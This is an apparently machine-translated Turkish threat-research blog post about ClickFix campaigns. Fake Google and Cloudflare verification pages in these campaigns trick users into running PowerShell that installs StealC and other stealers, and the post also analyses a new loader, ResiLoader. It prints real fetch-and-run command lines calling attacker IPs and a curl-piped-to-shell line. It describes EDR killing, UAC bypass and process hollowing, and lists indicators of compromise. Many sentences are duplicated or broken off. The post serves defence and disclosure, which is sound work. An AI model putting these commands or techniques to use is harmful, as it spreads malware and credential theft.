Sahte Google ve Cloudflare doğrulama sayfaları birden fazla kötü amaçlı yazılım ailesini yayar Siber Güvenlik

Sahte Google ve Cloudflare doğrulama sayfaları birden fazla kötü amaçlı yazılım ailesini yayar

SyncTDS ve TrafficTDS ile bağlantı eklemek için 6 Temmuz'da güncellendi...

SyncTDS ve TrafficTDS ile bağlantı eklemek için 6 Temmuz'da güncellendi

İnsanları kötü amaçlı komutları kendileri çalıştıracak şekilde kandıran ClickFix saldırıları gelişmeye devam ediyor. Bu son kampanya, kurbanları kendi cihazlarına virüs bulaştırmaya ikna etmek için sahte Google ve Cloudflare doğrulama sayfalarını kullanıyor.

Tek bir hata, şifrelerinizi ve diğer hassas verilerinizi çalan, saldırganların bilgisayarınıza uzaktan erişmesine olanak tanıyan veya sisteminizin tam kontrolünü ele geçirebilecek ek kötü amaçlı yazılımlar indiren kötü amaçlı yazılımların yüklenmesine neden olabilir.

Detaylar ve Etkileri

HijackLoader, StealC, Remus, Amatera Stealer, CastleLoader, NetSupport ve Rust tabanlı bir hırsız dahil kötü amaçlı yazılım dağıtmak için aynı altyapıyı kullanan birden fazla kampanyayı ortaya çıkardık.

Bir enfeksiyon zincirinde, meşru Franz mesajlaşma uygulamasının truva atı haline getirilmiş bir sürümü, StealC bilgi hırsızlığını dağıtmadan önce güvenlik yazılımını devre dışı bırakan, ResiLoader adlı daha önce belgelenmemiş bir yükleyiciyi indiriyor.

Gelecekte Ne Bekleniyor?

Teknik ayrıntılara bakmadan önce bir sonraki kurban olmaktan nasıl kaçınabileceğinizi anlatalım.

Nasıl güvende kalınır?

Nasıl Önlem Alınmalı?

ClickFix saldırıları sizi komutları kendiniz çalıştırmaya ikna etmeye dayanır. En güvenli yaklaşım basittir:

Güvenilir bir kaynaktan gelen talimatları izlemediğiniz ve komutun tam olarak ne yaptığını anlamadığınız sürece, bir web sitesinden komutları asla kopyalayıp çalıştırmayın.

Sistem Güvenliği

Güvenilir bir kaynaktan gelen talimatları takip etmediğiniz ve komutun tam olarak ne yaptığını anlamadığınız sürece. Doğrulama sayfalarına karşı dikkatli olun. Google, Cloudflare, Microsoft ve diğer meşru hizmetler, insan olduğunuzu kanıtlamak veya bir sorunu çözmek için hiçbir zaman PowerShell komutlarını Windows'a yapıştırmanızı istemeyecektir.

Sonuç ve Değerlendirme

Google, Cloudflare, Microsoft ve diğer meşru hizmetler, insan olduğunuzu kanıtlamak veya bir sorunu çözmek için hiçbir zaman PowerShell komutlarını Windows'a yapıştırmanızı istemeyecektir. Aciliyetin sizi aceleye getirmesine izin vermeyin. Sahte doğrulama sayfaları, sizi hızlı hareket etmeye zorlamak için sıklıkla geri sayım sayaçlarını, ziyaretçi sayaçlarını veya uyarıları kullanır.

Sahte doğrulama sayfaları, sizi hızlı hareket etmeye zorlamak için sıklıkla geri sayım sayaçlarını, ziyaretçi sayaçlarını veya uyarıları kullanır. Güvenlik yazılımınızı güncel tutun. Gerçek zamanlı koruma ve web koruması, kötü amaçlı web sitelerine ulaşmadan önce engellenmesine yardımcı olabilir.

Gerçek zamanlı koruma ve web koruması, kötü amaçlı web sitelerine ulaşmadan önce engellenmesine yardımcı olabilir. Beklenmedik teknik talimatları sorgulayın. Bir web sitesi size PowerShell'i, Komut İstemi'ni veya Terminal'i açmanızı söylüyorsa durun ve talimatları şirketin resmi destek kanalları aracılığıyla doğrulayın.

Teknik Analiz

Profesyonel ipucu: Malwarebytes Tarayıcı Koruması, bir web sitesi içeriği panonuza kopyalamaya çalıştığında sizi uyarabilir; bu, ClickFix sayfalarının yaygın olarak kullandığı bir numaradır.

Bu araştırmada analiz edilen kampanyalar en az 2025'in sonlarından beri aktif ve kötü amaçlı yazılım dağıtmak için çeşitli sahte Google ve Cloudflare sayfalarını kullanıyor. Yemler farklı olsa da, saldırganların sürekli olarak yeni dağıtım yöntemleri ve yükleri test etmesiyle aynı altyapıyı ve enfeksiyon zincirini paylaşıyorlar.

Önemli Gelişmeler

Farklı yemler, tek hedef

Uzmanların Görüşleri

Kampanyaların çoğu çeşitli özellikleri paylaşıyor:

Daha sonraki aşamaları çıkarmak için C:\ProgramData\Zooms klasörünün kullanılması

sonraki aşamalarda benzer modelleri izleyen PowerShell ClickFix komutlarını çıkarmak için

Yükleri teslim etmek için Cloudflare R2 paketlerinin kullanılması

ASN Dedik Services Limited tarafından barındırılan IP adresleri

Yalnızca "hehe" ifadesini içeren HTML yanıtları

Bu göstergeler zamanla değiştiğinden her enfeksiyon zincirinde görülmezler. Kampanyalar, düzenli olarak tanıtılan yeni yükler ve dağıtım yöntemleriyle gelişmeye devam ediyor. Örneğin bazı durumlarda IP adresi, paketler yerine doğrudan yük dağıtımı için kullanılır.

Kullanıcı tarafından kopyalanan son komut genellikle şu kalıba girer:

powershell -c “iex(irm '{IP}:{Port}/{Random Path}' -UseBasicParsing)”

Analiz edilen vakalarda bağlantı noktası ve yol her zaman mevcut değildir; bağlantı noktaları rastgeledir ancak kullanılanlardan bazıları şunlardır: 6600, 9900, 5506, 7895, 7493, 149, 8442.

Bu komutları yürütmek için, çoğunlukla Google ve Cloudflare ile ilgili olan ClickFix ile ilgili çeşitli şablonlar kullanılır. Ayrıca bazı durumlarda PowerShell komutunun IClickFix çerçevesi üzerinden dağıtıldığını da tespit ettik.

Bu ClickFix kampanyalarının aşağıdakiler aracılığıyla dağıtıldığını gözlemledik:

Muhtemelen süresi dolmuş ve oyuncu(lar) tarafından yeniden satın alınmış eski web siteleri.

CloudFlare Sayfaları ( .pages.dev alanları).

alanlar). Güvenliği ihlal edilmiş web siteleri.

Örneğin QR kodu veya web dosyası erişimiyle ilgili sahte hizmetler.

Google ClickFix cezbeder

Bu kampanyaların arkasındaki aktörler, Google ile ilgili çeşitli HTML sayfalarını ve kitlerini kullanıyor.

Bir cazibesi ben Google reCAPTCHA doğrulamasını taklit eder. Sayfalar, sahte veya kötü amaçlı içerik görüntüleyen rastgele URL'lerde barındırılmaktadır. Bu alan adları genellikle yakın zamanda yeni IP adreslerine çözümlenmeye başlayan eski kayıtlardır ve bu da bunların kampanya için yeniden tasarlandığını düşündürmektedir.

Bu sayfalardan bazılarında "zoneid", "cost", "device", "country", "clickid" gibi URL parametreleri bulunur, örneğin:

/conf/captcha.html?zoneid=10420852

/wincapbot/nobot.html

/xmr/trkuste.php?zone=5327134

korusun.php?zoneid=10327549&clickid=1091581084925173761&cost=0.000000&country=ABD&device=desktop

"Manuel Doğrulama Gerekli" ClickFix sayfası

Bu durumda ClickFix ile ilgili işlevler CustomCaptcha sınıfında uygulanır. Komut herhangi bir karışıklık olmadan açık bir şekilde mevcuttur.

“CustomCaptcha” sınıfındaki StartVerification” yöntemi

Başka bir dağıtım yöntemi, .pages.dev alt alanlarında barındırılan Cloudflare Sayfalarını kullanır.

“İnsan olduğunuzu doğrulayın” ClickFix sayfası

Bu durumda, HTML sayfası çeşitli değişkenlerin bildirilmesi ve bunların XORlanması yoluyla karartılır. Gizlemesi kaldırılan koda SECURITY GATEWAY adı verilir ve GatewayRuntime, RemoteVault, BeaconDispatcher, Clipboard, TokenController ve PanelController işlevlerinden oluşur.

Kod, saldırganların komutu uzaktan veya yerel olarak almasına olanak tanır. Bu örnekte, kötü amaçlı PowerShell komutu yerel olarak depolanır.

“GÜVENLİK AĞ GEÇİDİ” kodunda bildirilen PowerShell komutu

Ayrıca bu alan adlarından bazılarının geçmişte, bu durumda yetkisiz Google girişiyle ilişkili başka bir tuzak dağıttığını da tespit ettik. Bu ClickFix cazibesi, kullanıcıdan cihazını birincil olarak ayarlamak için kötü amaçlı komutu kopyalayıp yapıştırmasını ister.

"Güvenilir jetonla yeni oturum açma" ClickFix sayfası

Bu ClickFix kitinin ilginç yanı, yorumlarda açıklandığı gibi bir "onay kapısı" içermesi ve saldırganın, kullanıcının hangi komutu çalıştıracağını panelden manuel olarak seçmesi gerekmesidir.

Kit ve “onay kapısı” hakkında yorumlar

Daha yeni kampanyalarda, Google Meet ile ilgili, ses sorunlarını düzeltmek için kötü amaçlı bir komutun kopyalanıp yapıştırılmasını gerektiren bir ClickFix tuzağı tespit ettik.

"Ses sürücüsünü düzeltme" Google Meet ClickFix cazibesi

Analiz edilen durumlarda, /api/driver-clipboard.php uç noktası aşağıdaki kötü amaçlı komutu döndürdü:

{"mac":"curl -kfsSL $(echo '…'|base64 -D)|zsh","windows":"powershell -c \"iex(irm '151.240.151.126/rRlmZcaaZfAE3U2BaH' -UseBasicParsing)\""}

Bu kampanyanın arkasındaki aktörler, çoğu Google ile bağlantılı çeşitli kitler ve yemler kullanıyor. Ancak aynı altyapıyla ilgili komutları kopyalayan başka yemler de tespit ettik.

Bu kampanyaların arkasındaki saldırganlar aynı zamanda CloudFlare ClickFix tuzağıyla ilgili farklı şablonlar kullanan birden fazla web sitesini de tehlikeye atıyor.

“İnsan olduğunuzu doğrulayın” ClickFix sayfaları

CloudFlare sayfaları için kullanılan birkaç şablon tespit ettik. Analiz edilen vakalarda komut açıkça veya bazı durumlarda gizlenmiş olarak mevcuttur.

CloudFlare ClickFix HTML sayfalarından bazıları

Ayrıca özel olarak oluşturulmuş bazı sahte hizmet web sitelerini de tespit ettik. Örneğin, bir "QR Oluşturucum" sitesi, gizlenmiş bir QR kodu görüntüler ve kullanıcıdan, kullanıcının bir robot olmadığını doğrulamak için bir PowerShell komutu çalıştırmasını ister.

“QR Code” ClickFix yem sayfası

Bu durumda komut 64 tabanında kodlanmıştır:

Kodu çözülmüş PowerShell komutu

PowerShell indiricisi

Kullanıcı tarafından yürütülen ClickFix komutu bir betiğin kodunu çözer ve onu tmp{4 char}.tmp.ps1 adıyla Temp klasörüne bırakır.

Bu komut dosyasının çeşitli varyasyonlarını tespit ettik ancak son sürümler aşağıdakileri yapıyor:

C:\ProgramData\Zooms klasörünü oluşturun.

. Bir sonraki aşamayı CloudFlare paketinden indirin ve C:\ProgramData\Zooms dizinine kaydedin. Komut dosyasının bazı varyantlarında bir sonraki aşama doğrudan bir IP'den indirilir.

. Komut dosyasının bazı varyantlarında bir sonraki aşama doğrudan bir IP'den indirilir. Güvenliği ihlal edilen makinenin bilgilerini http://{IP}/dl-callback adresine gönderin. Senaryonun bazı varyantlarında bu kısım mevcut değildir.

PowerShell betiği bırakıldı

Bu kampanyaların arkasındaki saldırganlar çok sayıda farklı veri yükü kullanıyor. Kampanyalar çok çeşitli veri yükü sunuyor. Aşağıdaki tablo, indirilen bazı dosya adlarını ve yükledikleri kötü amaçlı yazılımları özetlemektedir. Analiz edilen vakaların çoğu için, daha sonra StealC hırsızı için de göreceğimiz gibi, nihai yük DLL Hijacking aracılığıyla dağıtıldı.

Dosya Dağıtılmış Kötü Amaçlı Yazılım dağıtılmış libEGL.zip, Safe-1.zip Trojanlı Elektron Uygulaması, ResiLoader ve StealC T est.msi Deno Yükleyici ve PowerShell Stealer arworks.zip Amatera Stealer water-night.zip Remus Stealer Setup.msi , Invintrum_first.msi NetSupport Traffic1.msi CastleLoader ibrowser.exe Rust Stealer

Sonuçta StealC'yi dağıtan ResiLoader adında yeni bir yükleyiciyi analiz ettik. Ayrıca son kampanyalardaki tehdit aktörünün sonunda PowerShell'de geliştirilen bir hırsızı dağıtmak için Deno'yu kullanmaya başladığını tespit ettik; Bu enfeksiyon zincirinin analizi gelecekteki bir blog yazısının konusu olabilir.

Trojanlaştırılmış Electron uygulaması ResiLoader'ı indiriyor

Bu durumda ZIP şu yerden indirildi:

pub-7080e0c20a0e47ca95a476869c532367.r2[.]dev/libEGL.zip

C:\ProgramData\Zooms\libEGL.zip_ext

Zip, "Franz" adlı açık kaynaklı mesajlaşma uygulamasının truva atı haline getirilmiş bir sürümünü içeriyor:

ResiLoader'ı indirmek için kullanılan truva atı haline getirilmiş "Franz" uygulaması

Kötü amaçlı kod index.js dosyasına uygulanır:

Arka kapılı uygulamadaki gizlenmiş kod

İndirici aşağıdaki işlemleri gerçekleştirir:

Dizelerin kodunu HC() işleviyle çözün.

. Readme.txt dosyasını okur, AAAA-BBBB biçiminde bir kampanya anahtarı bekler ve bunu bir dizi belirteç olarak döndürür. Bu durumda isim resiloader-1 olur ve bunun için indirdiğimiz DLL’e “ResiLoader” adını veriyoruz.

, formun bir kampanya anahtarını bekler ve bunu bir belirteç dizisi olarak döndürür. Bu durumda adı şudur ve bunun için indirilen DLL'ye “ResiLoader” diyoruz. %APPDATA%\setup.txt dosyasını okur; yoksa rastgele 8 karakterlik bir dize oluşturur ve onu sürdürür.

; yoksa rastgele 8 karakterlik bir dize oluşturur ve onu sürdürür. app.setLoginItemSettings kullanarak kalıcılık elde etme.

. https[:]//completstep[.]com/api/ adresine bir POST isteği gönderir ve JSON yanıtını detaylandırır. Task.e mevcutsa, eval(task.e) komutunu çalıştırır; saldırganın rastgele JavaScript kodu yürütmesine olanak tanır. Task.files mevcutsa, %TEMP%\\ dosyasını oluşturun, kodunu çözün ve her dosyayı yazın; Herhangi bir dosya adı .exe ile bitiyorsa, onu child_process.exec aracılığıyla çalıştırın.

ve JSON yanıtını detaylandırın

Bizim durumumuzda ssh-add.exe dosyasının DLL ele geçirilmesini gerçekleştiren bir ZIP aldık:

{"task":{"name":"JUNE18USY","files":{ "msys-2.0.dll":"", "msys-crypto-3.dll":"", "msys-gcc_s-seh-1.dll":"", "ssh-add.exe":"" }}}

Daha sonra yürütülebilir dosya şununla yürütüldü:

C:\WINDOWS\system32\cmd.exe /d /s /c ""C:\Users\{kullanıcı}\AppData\Local\Temp\1782122017599\ssh-add.exe""

Msys-crypto-3.dll, BYOD tekniği kullanarak AV/EDR kaçırma uygulayan, kalıcılık elde eden ve sonuçta StealC hırsızını yükleyen, gizlenmiş bir .NET NativeAOT yükleyicisidir. Bu yükleyici için belirli bir özellik bulamadık ve bu nedenle önceki readme.txt dosyasında bulunan dizeye dayanarak onu "ResiLoader" olarak adlandırdık.

Yükleyici, bazıları açık ve bazıları şifrelenmiş birkaç dize içerir. Dizelerin şifresini çözdükten sonra ResiLoader'ın işlevselliğinin tam resmini görmek mümkündür.

MANPO: ReadModule len=... MANPO: magicOffset=... … PERS: FAIL tüm dosya kopyaları başarısız oldu, çalıştırma anahtarını atladı PERS: FAIL hem HKLM hem de HKCU Çalıştırma anahtarı yazmaları başarısız oldu… RUNPE: CreateProcess başarısız oldu RUNPE: PEB yaması yapıldı RUNPE: VirtualAllocEx başarısız oldu… POST: RunForever'dan çıkıldı (beklenmedik) POST: RunForever'a giriliyor POST: içi boş=

Yükleyici aşağıdaki işlemleri gerçekleştirir:

AtLorenBase işaretçisini ve kodlanmış blobun uzunluğunu okuyarak iki veri içeren kodlanmış blobu çıkarın. Daha sonra blobun kodunu çözer ve pcdhost.sys sürücüsünün (OPSWAT) şifresini çözer.

AppRemover Sürücüsü) ve StealC yükünü özel bir şifre çözme algoritması kullanarak yönetir.

ve kodlanmış bloğun uzunluğu. Daha sonra, blobun kodunu çözer ve özel bir şifre çözme algoritması kullanarak sürücünün (OPSWAT AppRemover Sürücüsü) ve StealC yükünün şifresini çözer. Bırakılan sürücüyü kullanarak EDR/AV işlemleriyle ilgili 140'tan fazla işlemi sonlandırın.

ICMLuaUtil Yükseltilmiş COM Arayüzü aracılığıyla UAC bypass'ı gerçekleştirin.

Yükseltilmiş COM Arayüzü. Kendini kopyalayan bir C:\ProgramData\Google Update klasörü oluşturun; RUN Kayıt Defteri Anahtarını kullanarak kalıcılık ekleme

, kendini kopyalıyor; RUN Kayıt Defteri Anahtarını kullanarak kalıcılık ekleme cmd /c start "" /D "C:\ProgramData\Google Update" ssh-add.exe

Sonunda yükleyici, StealC hırsızını çalıştırmak için ServiceModelReg.exe işleminin işlem boşluğunu gerçekleştirir.

SyncTDS ve TrafficTDS ile bağlantılar

Potansiyel olarak aynı operatörlere bağlı başka ClickFix kampanyaları ve kitleri bulduk, ancak bunu doğrulayacak yeterli kanıt yok.

dasdasdikasjdas[.]tıklama alanı, bu kampanyayla ilgili IP'lerden birine çözümlenir 151[.]240[.]151[.]126 . Alan adı daha önce "SyncTDS" adlı bir panel döndürüyordu. SyncTDS ile ilgili paneli döndüren 20'den fazla alan adı bulduk. Bu panelin grafikleri de zamanla değişti.

Bu "SyncTDS" etki alanlarından biri olan maskingofking[.]xyz, 193.111.117[.]6'ya çözümlenir; bu, ClickFix ile ilgili birkaç alanı ve "TrafficTDS" adı verilen ilginç bir kit içeren açık bir dizini barındırır. Bu kit, operatörün Windows, Linux, MacOS ve Android ile ilgili farklı yükleri desteklemesine olanak tanır. Bu durumda kullanıcıya gösterilen sayfalar CloudFlare yemli ClickFix ile ilgilidir.

“Trafik TDS” panelinin yapıları

Farklı işletim sistemlerine yönelik yükleri içeren “TrafficTDS” kiti

Bu kitin en ilginç kısımlarından biri, operatörün kullanıcıya kötü amaçlı APK'yı indirmesi için "Güncelleme Gerekli" sayfasını göstermesine olanak tanıyan "APK yöneticisi" bölümüdür.

APK yöneticisi bölümü

Android cihazlar için sahte güncelleme sayfası

72907d0ca3258365838626f6a8d993a6 : ResiLoader DLL

0234E3188F2883A438B3F2BEAB7A78B2 : ÇalmakC

6a9ac6b3fff7b695dbd4df6ff7f6c516 : Remus

206ce339febca0c3bcc850f42595fc63 : Amatera Hırsızı

eee416efcb1e33f220cdb4b05496a07a : NetSupport RAT

b8d53740024d126cb55f83854335a4ab : Pas Hırsızı

ClickFix sayfalarını dağıtın:

merkeziwildcats[.]com

cloud.antibotv3[.]com

cloudautosolutions[.]com

sunseekersupply[.]com

p-floribunds.pages[.]dev

pg-altirade2.pages[.]dev

pg-cordivant-m6.pages[.]dev

g-luminence.pages[.]dev

jeneratör-qrcode[.]çevrimiçi

eorgke09054909j[.]com

Yük dağıtımı için kullanılan CloudFlare paketleri:

pub-4ed7b8ecee744dea930d74ba4ac74285.r2[.]dev

pub-620528e2dc874e16937673265aa23d39.r2[.]dev

pub-4ed7b8ecee744dea930d74ba4ac74285.r2[.]dev

pub-9682d5896df841679c5a17eb41273f89.r2[.]dev

pub-18d99d0d18b94e85824c1cc4d5b5c637.r2[.]dev

pub-0170eabb9df346bd822f863b7c3946e3.r2[.]dev

pub-4ed7b8ecee744dea930d74ba4ac74285.r2[.]dev

Unitedstateverif[.]com : yük dağıtımı

bigflaredefence[.]com : yük dağıtımı

popüler kart[.]mağazası: Rust Stealer C2

xzz[.]proxygrid[.]cc : Amatera Stealer C2

completstep[.]com : Yükleyici C2

eventlogerps1[.]ink : Deno Yükleyici

be231ro963[.]com : Deno Yükleyici

Yük dağıtımı için kullanılan IP:

146.19.248[.]120 : ÇalmaC C2

Paylaş: